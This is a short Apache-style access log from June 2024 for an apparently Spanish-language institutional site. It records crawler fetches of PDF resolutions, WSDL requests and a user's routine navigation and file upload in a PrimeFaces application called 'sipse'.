66.249.66.11 - - [29/Jun/2024:10:31:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5182.pdf HTTP/1.1" 200 366745
66.249.66.11 - - [29/Jun/2024:10:31:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2841.pdf HTTP/1.1" 200 336360
201.245.192.253 - - [29/Jun/2024:10:31:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:10:31:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
181.53.12.168 - - [29/Jun/2024:10:32:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5822
181.53.12.168 - - [29/Jun/2024:10:32:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 66203
181.53.12.168 - - [29/Jun/2024:10:32:06 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:32:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:32:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:32:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:32:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:32:06 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.53.12.168 - - [29/Jun/2024:10:32:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:32:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:32:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 59576
181.53.12.168 - - [29/Jun/2024:10:32:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 59576
181.53.12.168 - - [29/Jun/2024:10:32:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
181.53.12.168 - - [29/Jun/2024:10:32:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1568
181.53.12.168 - - [29/Jun/2024:10:32:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1568
181.53.12.168 - - [29/Jun/2024:10:32:11 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 49755
181.53.12.168 - - [29/Jun/2024:10:32:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 22623
181.53.12.168 - - [29/Jun/2024:10:32:14 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 22611
181.53.12.168 - - [29/Jun/2024:10:32:16 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 22623
181.53.12.168 - - [29/Jun/2024:10:32:18 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 173089
181.53.12.168 - - [29/Jun/2024:10:32:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:32:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:32:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:32:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:32:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:32:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:32:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
40.77.167.9 - - [29/Jun/2024:10:32:49 -0500] "GET / HTTP/1.1" 200 4720
20.110.58.60 - - [29/Jun/2024:10:32:50 -0500] "GET / HTTP/1.1" 200 4720
207.46.13.168 - - [29/Jun/2024:10:32:50 -0500] "GET /favicon.ico HTTP/1.1" 404 1034
20.110.58.60 - - [29/Jun/2024:10:32:51 -0500] "GET /favicon.ico HTTP/1.1" 404 1034
66.249.66.12 - - [29/Jun/2024:10:32:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0090.pdf HTTP/1.1" 200 1195287
40.77.167.9 - - [29/Jun/2024:10:32:51 -0500] "GET / HTTP/1.1" 200 4720
20.110.58.60 - - [29/Jun/2024:10:32:52 -0500] "GET / HTTP/1.1" 200 4720
207.46.13.168 - - [29/Jun/2024:10:32:52 -0500] "GET /favicon.ico HTTP/1.1" 404 1034
40.77.167.9 - - [29/Jun/2024:10:32:53 -0500] "GET / HTTP/1.1" 200 4720
20.110.58.60 - - [29/Jun/2024:10:32:54 -0500] "GET / HTTP/1.1" 200 4720
207.46.13.168 - - [29/Jun/2024:10:32:54 -0500] "GET /favicon.ico HTTP/1.1" 404 1034
172.22.2.4 - - [29/Jun/2024:10:32:56 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [29/Jun/2024:10:32:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:10:31:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.53.12.168 - - [29/Jun/2024:10:33:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 22304
181.53.12.168 - - [29/Jun/2024:10:33:12 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 200 1330
181.53.12.168 - - [29/Jun/2024:10:33:12 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:33:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:33:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:33:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:33:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:33:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:33:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:33:12 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 200 28091
181.53.12.168 - - [29/Jun/2024:10:33:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:33:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:33:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:33:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:33:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:33:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:33:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:33:18 -0500] "POST /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 200 220870
181.53.12.168 - - [29/Jun/2024:10:33:28 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 6164
181.53.12.168 - - [29/Jun/2024:10:33:29 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:33:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 38277
181.53.12.168 - - [29/Jun/2024:10:33:43 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:33:43 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:33:43 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [29/Jun/2024:10:33:43 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
